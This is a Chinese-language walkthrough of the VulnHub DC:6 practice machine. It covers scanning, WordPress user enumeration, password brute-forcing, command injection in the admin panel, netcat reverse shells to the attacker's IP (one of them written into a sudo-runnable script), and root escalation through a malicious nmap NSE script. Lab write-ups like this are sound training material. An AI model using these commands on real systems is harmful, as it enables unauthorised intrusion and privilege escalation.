准備工作
在vulnhub官網下載DC:6靶機DC: 6 ~ VulnHub
導入到vmware,設置成NAT模式
打開kali准備進行滲透(ip:192.168.200.6)
信息收集
利用nmap進行ip端口探測
nmap -sS 192.168.200.6/24
探測到ip為192.168.200.17的靶機,開放了80端口和22端口
再用nmap對所有端口進行探測,確保沒有別的遺漏信息
nmap -sV -p- 192.168.200.17
先看看80端口,一直打不開,重定向到了wordy,像DC:2的方法一樣操作,修改host文件
vi /etc/hosts
和dc:2的界面一模一樣框架也是 WordPress
dirsearch掃描也掃到了/wp-login.php后台登陸頁面
接下來和dc:2的操作基本一致
wpscan掃描
使用kali自帶的工具wpscan(wordpress框架專門的漏洞掃描工具)列舉出所有用戶
wpscan --url http://wordy/ -e u
爆出五個用戶 admin、jens、graham、mark、sarah,保存下來待會進行爆破
但是用了很多字典都爆破不出來,不知道怎么辦的時候才發現在下載地址處的最下面給了線索DC: 6 ~ VulnHub
先cd到/usr/share/wordlists/這個目錄,因為rockyou這個文件沒有解壓不能直接打開
gunzip rockyou.txt.gz
再返回桌面執行作者給的命令
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
直接使用wordy進行爆破
wpscan --url http://wordy/ -U user -P passwords.txt
爆到用戶名mark 密碼helpdesk01
nc反彈shell
登陸到剛剛的后台頁面,在這里找到了命令執行的地方,試了一下127.0.0.1|ls 發現有漏洞可以執行任意命令,那就可以反彈shell到kali上
使用nc反彈shell,但是那個框有字數限制,用bp抓一下再放出去就解決了
nc -e /bin/bash 192.168.200.6 9999
再使用python 通過pty.spawn()獲得交互式shell
python -c'import pty;pty.spawn("/bin/bash")'
root沒有權限進不去,但是在home里發現了四個用戶,在mark用戶發現了一個txt文件,里面有graham的密碼 GSo7isUM1D4
使用su切換成graham,看看graham的權限
發現jens下的backups.sh可以不用密碼執行,可以用來獲取jens的權限
這里有兩種方法第一種是寫入/bin/bash/,然后以jens的用戶來執行文件直接獲取權限
這里我記錄第二種方法,寫入nc命令,然后在另一端監聽nc -lvf 9999,最后在以jens用戶執行sh文件,再使用python 通過pty.spawn()獲得交互式shell,兩種方法思路都差不多
echo 'nc 192.168.200.6 9999 -e /bin/bash' > backups.sh sudo -u jens /home/jens/backups.sh python -c'import pty;pty.spawn("/bin/bash")'
在看看jens的權限sudo -l
發現root權限namp無需密碼,利用這個文件提權
權限提升
namp有執行腳本的功能,那就可以寫一個執行bash的腳本文件,通過namp執行來提權
echo 'os.execute("/bin/sh")' > getroot.nse //nes腳本后綴
sudo nmap --script=/home/jens/getroot.nse //namp執行
DONE
參考文章